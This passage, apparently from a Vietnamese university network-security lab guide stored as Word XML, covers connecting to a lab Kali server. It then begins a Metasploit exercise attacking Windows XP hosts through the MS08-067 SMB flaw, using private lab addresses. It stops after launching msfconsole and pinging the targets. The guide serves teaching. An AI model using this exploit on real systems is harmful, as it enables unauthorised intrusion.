        <w:t>\____|__  /____|     |____|     |____|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="450BAA69" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
        <w:t xml:space="preserve">        \/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="6B9551C3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
        <w:t xml:space="preserve">         BO MON MANG &amp; TRUYEN THONG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="5A6E9AF4" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
        <w:t>KHOA CONG NGHE THONG TIN - TRUONG DAI HOC BACH KHOA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="603B58E2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
        <w:t>===================================================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="5FCDB290" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="71481DB2" w14:textId="2EFFDAE4">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00841EC1">
        <w:t>&lt;masinhvien&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00841EC1" w:rsidR="175F72B9">
        <w:t>@vmkali</w:t>
      </w:r>
      <w:r w:rsidRPr="00841EC1">
        <w:t>:~$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00841EC1" w:rsidR="009F5AB1" w:rsidP="00A6227C" w:rsidRDefault="009F5AB1" w14:paraId="01026E0A" w14:textId="1F0F5149">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29AE32B7" wp14:editId="6EF5C0EF">
            <wp:extent cx="5940425" cy="3249930"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:docPr id="2080709711" name="Picture 20807097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709711" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="3249930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="76A81844" w14:textId="5DB708CA">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Cách 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="00DF1EF0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">công cụ </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="007C7F32">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>MobaXterm</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink w:history="1" r:id="rId11">
        <w:r w:rsidRPr="009B135C" w:rsidR="003753BC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>link</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009B135C" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="003753BC" w:rsidP="008E3F20" w:rsidRDefault="003753BC" w14:paraId="0F9A9480" w14:textId="48BEFB23">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">+ Tải và cài đặt </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>MobaXterm</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, chạy chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="003753BC" w:rsidP="008E3F20" w:rsidRDefault="003753BC" w14:paraId="7E97F014" w14:textId="261D5BF6">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> [User sessions]</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/[</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">New session]: Remote host: </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="026CC99B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>wandertour</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.ddns.net, </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nhập</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> username. Port: 22. </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="003753BC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="003753BC" w:rsidP="008E3F20" w:rsidRDefault="003753BC" w14:paraId="680E7F89" w14:textId="2396E152">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E4EC14E" wp14:editId="003273E3">
            <wp:extent cx="5940425" cy="3964940"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1893067515" name="Picture 189306751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067515" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="3964940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="007C7F32" w:rsidP="008E3F20" w:rsidRDefault="007C7F32" w14:paraId="083F7250" w14:textId="4CA6DCBF">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="386F6394" wp14:editId="52E96EDC">
            <wp:extent cx="5940425" cy="3414532"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="9475919" name="Picture 9475919" descr="A computer screen shot of a black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5919" name="Picture 1" descr="A computer screen shot of a black screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId13"/>
                    <a:srcRect t="-1" b="2162"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="3414532"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="003753BC" w:rsidP="008E3F20" w:rsidRDefault="003753BC" w14:paraId="63F676BE" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="003753BC" w:rsidP="003753BC" w:rsidRDefault="003753BC" w14:paraId="10082CC5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">&gt;&gt; Kết quả truy cập từ xa đến máy chủ Kali thông qua lệnh. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00384765" w:rsidP="00CA4DC8" w:rsidRDefault="008E3F20" w14:paraId="5604BB50" w14:textId="62D88760">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc20454833" w:id="14"/>
      <w:bookmarkStart w:name="_Toc20454835" w:id="15"/>
      <w:bookmarkStart w:name="_Toc145594623" w:id="16"/>
      <w:bookmarkStart w:name="_Toc65834498" w:id="17"/>
      <w:bookmarkStart w:name="_Toc319838646" w:id="18"/>
      <w:bookmarkStart w:name="_Toc20808942" w:id="19"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>Tấn công Windows XP</w:t>
      </w:r>
      <w:r w:rsidR="00A6227C">
        <w:rPr/>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0041641A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1EFCFF1D">
        <w:rPr/>
        <w:t>CVE-2008-</w:t>
      </w:r>
      <w:r w:rsidR="1EFCFF1D">
        <w:rPr/>
        <w:t xml:space="preserve">4250 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A6227C">
        <w:rPr/>
        <w:t>ms</w:t>
      </w:r>
      <w:r w:rsidR="00A6227C">
        <w:rPr/>
        <w:t>08_067_netapi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidRPr="006604C9" w:rsidR="00A6227C" w:rsidP="00A6227C" w:rsidRDefault="00A6227C" w14:paraId="5ADCAAC2" w14:textId="5E8FB881">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6227C">
        <w:t xml:space="preserve">Tấn công Windows XP dựa vào lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="006604C9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="001D3924" w:rsidRDefault="00384765" w14:paraId="7DCEC3CC" w14:textId="6FEC649C">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="006604C9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="008E3F20">
        <w:t xml:space="preserve">lổ hổng SMB </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tại cổng </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="008E3F20">
        <w:t>445</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidRPr="009B135C" w:rsidR="008E3F20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="59E74AD4" w14:textId="1EA9B026">
      <w:pPr/>
      <w:bookmarkStart w:name="_Toc20454836" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>Máy</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="026CC99B">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>wandertour</w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00922E37">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>.ddns.net</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>có</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D3924">
        <w:rPr/>
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr/>
        <w:t>ịa</w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr/>
        <w:t>chỉ</w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr/>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r w:rsidR="006604C9">
        <w:rPr/>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidR="006604C9">
        <w:rPr/>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00F16D27">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>192</w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="008E3F20">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>.168.1.10</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>sẽ</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> tấn công </w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>máy</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> Win XP </w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>có</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr/>
        <w:t>Địa</w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr/>
        <w:t>chỉ</w:t>
      </w:r>
      <w:r w:rsidR="00F16D27">
        <w:rPr/>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r w:rsidR="00ED0772">
        <w:rPr/>
        <w:t>RHOST</w:t>
      </w:r>
      <w:r w:rsidR="00ED0772">
        <w:rPr/>
        <w:t xml:space="preserve">S = </w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00F16D27">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>192</w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="008E3F20">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>.168.1.110, 192.168.1.111, 192.168.1.112</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Hlk20539517" w:id="21"/>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>dựa</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>trên</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>lổ</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>hổng</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>smb</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="000634C0" w:rsidRDefault="001D3924" w14:paraId="192E8C06" w14:textId="7B1A8824">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc20454837" w:id="22"/>
      <w:bookmarkStart w:name="_Toc145594624" w:id="23"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:t>Thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="007B4E3E" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="4EA3AB6A" w14:textId="4462FDB9">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B4E3E">
        <w:t xml:space="preserve">Kiểm tra </w:t>
      </w:r>
      <w:r w:rsidR="00F458FF">
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r w:rsidR="008D7D49">
        <w:t>dò tìm lỗ h</w:t>
      </w:r>
      <w:r w:rsidR="00EE731D">
        <w:t xml:space="preserve">ổng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F458FF" w:rsidR="00F458FF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidRPr="00F458FF" w:rsidR="00F458FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F458FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE731D">
        <w:t>trên máy ở xa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593682" w:rsidP="00593682" w:rsidRDefault="00593682" w14:paraId="45C8C642" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593682" w:rsidP="00593682" w:rsidRDefault="00593682" w14:paraId="426ABE19" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593682" w:rsidP="00593682" w:rsidRDefault="00593682" w14:paraId="140BA30C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593682" w:rsidP="7C6BFC6E" w:rsidRDefault="00593682" w14:paraId="1D7AAE4C" w14:textId="596C9F7B">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t>Thời</w:t>
      </w:r>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t>gian</w:t>
      </w:r>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t>khởi</w:t>
      </w:r>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t>động</w:t>
      </w:r>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t>khoảng</w:t>
      </w:r>
      <w:r w:rsidR="7C756DA8">
        <w:rPr/>
        <w:t xml:space="preserve"> 10p.</w:t>
      </w:r>
      <w:r w:rsidR="2D7EFD4A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2D7EFD4A">
        <w:rPr/>
        <w:t>Có</w:t>
      </w:r>
      <w:r w:rsidR="2D7EFD4A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2D7EFD4A">
        <w:rPr/>
        <w:t>thể</w:t>
      </w:r>
      <w:r w:rsidR="2D7EFD4A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2D7EFD4A">
        <w:rPr/>
        <w:t>nhấn</w:t>
      </w:r>
      <w:r w:rsidR="2D7EFD4A">
        <w:rPr/>
        <w:t xml:space="preserve"> Ctrl + C </w:t>
      </w:r>
      <w:r w:rsidR="2D7EFD4A">
        <w:rPr/>
        <w:t>để</w:t>
      </w:r>
      <w:r w:rsidR="2D7EFD4A">
        <w:rPr/>
        <w:t xml:space="preserve"> vào nhanh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593682" w:rsidP="00593682" w:rsidRDefault="00593682" w14:paraId="067D5029" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593682" w:rsidP="00593682" w:rsidRDefault="00593682" w14:paraId="1078F15D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidR="00593682">
        <w:rPr/>
        <w:t>msf6 &gt; ping 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2071CDBC" w:rsidP="0E33AEE1" w:rsidRDefault="2071CDBC" w14:paraId="58A202A1" w14:textId="18BC47DB">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidR="2071CDBC">
        <w:rPr/>
        <w:t>msf6 &gt; ping 192.168.1.111</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6BA8824C" w:rsidP="3CE16CD3" w:rsidRDefault="6BA8824C" w14:paraId="20EF28A7" w14:textId="62D74989">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
